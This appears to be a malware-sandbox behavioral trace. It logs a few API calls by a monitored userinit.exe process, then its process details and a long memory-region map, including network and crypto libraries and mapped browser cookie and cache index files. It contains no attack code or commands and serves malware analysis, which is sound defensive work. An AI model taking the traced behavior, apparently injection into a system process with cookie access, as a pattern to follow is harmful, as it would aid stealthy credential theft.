[0170.135] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.135] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.135] GetSystemDefaultLangID () returned 0x2c0409
[0170.136] VerLanguageNameA (in: wLang=0x409, szLang=0x1aeccc, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0170.136] ExitProcess (uExitCode=0x0)
Thread:
id = 282
os_tid = 0x834
Thread:
id = 283
os_tid = 0x8c8
Process:
id = "45"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be880"
os_pid = "0x850"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5160
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5161
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5162
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5163
start_va = 0x70000
end_va = 0xaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 5164
start_va = 0xd0000
end_va = 0xd8fff
entry_point = 0xd0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 5165
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 5166
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5167
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5168
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 5169
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 5170
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 5172
start_va = 0x1f0000
end_va = 0x2effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 5173
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5174
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5175
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5176
start_va = 0xe0000
end_va = 0x146fff
entry_point = 0xe0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5177
start_va = 0x3c0000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 5178
start_va = 0x6d720000
end_va = 0x6d7a3fff
entry_point = 0x6d720000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 5179
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5180
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5181
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5182
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5183
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5184
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5185
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5186
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5187
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5188
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5189
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5190
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 5191
start_va = 0x2f0000
end_va = 0x3b7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 5192
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5193
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5197
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5198
start_va = 0x50000
end_va = 0x50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 5199
start_va = 0x1a0000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 5200
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 5201
start_va = 0x580000
end_va = 0x117ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000580000"
filename = ""
Region:
id = 5202
start_va = 0x1180000
end_va = 0x127ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001180000"
filename = ""
Region:
id = 5203
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 5204
start_va = 0x1280000
end_va = 0x13affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001280000"
filename = ""
Region:
id = 5208
start_va = 0x1280000
end_va = 0x135efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001280000"
filename = ""
Region:
id = 5209
start_va = 0x1370000
end_va = 0x13affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001370000"
filename = ""
Region:
id = 5210
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 5211
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 5212
start_va = 0x13b0000
end_va = 0x148ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 5213
start_va = 0x1490000
end_va = 0x1dbffff
entry_point = 0x1490000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 5214
start_va = 0xb0000
end_va = 0xb6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000b0000"
filename = ""
Region:
id = 5215
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 5216
start_va = 0x1dc0000
end_va = 0x21b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001dc0000"
filename = ""
Region:
id = 5217
start_va = 0x13b0000
end_va = 0x142ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 5218
start_va = 0x1450000
end_va = 0x148ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001450000"
filename = ""
Region:
id = 5219
start_va = 0x21c0000
end_va = 0x22ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000021c0000"
filename = ""
Region:
id = 5223
start_va = 0x22d0000
end_va = 0x23cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 5228
start_va = 0x23d0000
end_va = 0x25cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023d0000"
filename = ""
Region:
id = 5232
start_va = 0x25d0000
end_va = 0x2650fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5233
start_va = 0x2660000
end_va = 0x26e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 5234
start_va = 0x25d0000
end_va = 0x2654fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5235
start_va = 0x2660000
end_va = 0x26e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 5239
start_va = 0x25d0000
end_va = 0x2658fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5240
start_va = 0x2660000
end_va = 0x26eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 5241
start_va = 0x25d0000
end_va = 0x265cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5242
start_va = 0x2660000
end_va = 0x26eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 5243
start_va = 0x26f0000
end_va = 0x2780fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 5247
start_va = 0x25d0000
end_va = 0x2662fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5248
start_va = 0x2670000
end_va = 0x2704fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5249
start_va = 0x25d0000
end_va = 0x2666fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5250
start_va = 0x2670000
end_va = 0x2708fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5254
start_va = 0x25d0000
end_va = 0x266afff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5255
start_va = 0x2670000
end_va = 0x270cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5256
start_va = 0x25d0000
end_va = 0x266efff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5257
start_va = 0x2670000
end_va = 0x2710fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5261
start_va = 0x2720000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 5262
start_va = 0x25d0000
end_va = 0x2674fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5265
start_va = 0x2680000
end_va = 0x2726fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 5266
start_va = 0x25d0000
end_va = 0x2678fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5267
start_va = 0x2680000
end_va = 0x272afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 5268
start_va = 0x25d0000
end_va = 0x267cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5272
start_va = 0x2680000
end_va = 0x272efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 5273
start_va = 0x2730000
end_va = 0x27e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5274
start_va = 0x25d0000
end_va = 0x2682fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5278
start_va = 0x2690000
end_va = 0x2744fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5279
start_va = 0x25d0000
end_va = 0x2686fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5280
start_va = 0x2690000
end_va = 0x2748fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5281
start_va = 0x25d0000
end_va = 0x268afff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5284
start_va = 0x2690000
end_va = 0x274cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5285
start_va = 0x25d0000
end_va = 0x268efff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5286
start_va = 0x2690000
end_va = 0x2750fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5290
start_va = 0x2760000
end_va = 0x2822fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 5291
start_va = 0x25d0000
end_va = 0x2694fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5292
start_va = 0x26a0000
end_va = 0x2766fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 5295
start_va = 0x25d0000
end_va = 0x2698fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5296
start_va = 0x26a0000
end_va = 0x276afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 5297
start_va = 0x25d0000
end_va = 0x269cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5300
start_va = 0x26a0000
end_va = 0x276efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 5301
start_va = 0x2770000
end_va = 0x2840fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 5304
start_va = 0x25d0000
end_va = 0x26a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5305
start_va = 0x26b0000
end_va = 0x2784fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5306
start_va = 0x25d0000
end_va = 0x26a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5309
start_va = 0x26b0000
end_va = 0x2788fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5310
start_va = 0x25d0000
end_va = 0x26aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5311
start_va = 0x26b0000
end_va = 0x278cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5323
start_va = 0x25d0000
end_va = 0x26aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5324
start_va = 0x26b0000
end_va = 0x2790fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5330
start_va = 0x27a0000
end_va = 0x2882fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 5331
start_va = 0x25d0000
end_va = 0x26b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5332
start_va = 0x26c0000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5338
start_va = 0x25d0000
end_va = 0x26b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5339
start_va = 0x26c0000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5361
start_va = 0x25d0000
end_va = 0x26bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5362
start_va = 0x26c0000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5363
start_va = 0x27b0000
end_va = 0x28a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 5364
start_va = 0x25d0000
end_va = 0x26c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5365
start_va = 0x26d0000
end_va = 0x27c4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5366
start_va = 0x25d0000
end_va = 0x26c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5367
start_va = 0x26d0000
end_va = 0x27c8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5368
start_va = 0x25d0000
end_va = 0x26cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5369
start_va = 0x26d0000
end_va = 0x27ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5370
start_va = 0x25d0000
end_va = 0x26cefff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5371
start_va = 0x26d0000
end_va = 0x27d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5372
start_va = 0x27e0000
end_va = 0x28e2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 5373
start_va = 0x25d0000
end_va = 0x26d4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5374
start_va = 0x26e0000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 5375
start_va = 0x25d0000
end_va = 0x26d8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5376
start_va = 0x26e0000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 5377
start_va = 0x25d0000
end_va = 0x26dcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 5378
start_va = 0x26e0000
end_va = 0x27effff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 5379
start_va = 0x27f0000
end_va = 0x2902fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 5380
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 5381
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 5382
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 5383
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 5384
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5385
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 5386
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 5387
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x150000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 5388
start_va = 0x2910000
end_va = 0x2a0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 5389
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 5390
start_va = 0x6d800000
end_va = 0x6d818fff
entry_point = 0x6d800000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 5391
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5392
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5393
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5394
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5395
start_va = 0x2b40000
end_va = 0x2b7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b40000"
filename = ""
Region:
id = 5396
start_va = 0x2bb0000
end_va = 0x2caffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 5397
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 5398
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 5399
start_va = 0x2cb0000
end_va = 0x2f7efff
entry_point = 0x2cb0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5400
start_va = 0x170000
end_va = 0x171fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 5401
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 5402
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x180000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 5403
start_va = 0x190000
end_va = 0x191fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 5404
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5405
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 5406
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 5407
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 5408
start_va = 0x1b0000
end_va = 0x1dbfff
entry_point = 0x1b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 5409
start_va = 0x1e0000
end_va = 0x1e7fff
entry_point = 0x1e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 5410
start_va = 0x3d0000
end_va = 0x3dffff
entry_point = 0x3d0000
region_type = mapped_file
name = "index.dat"
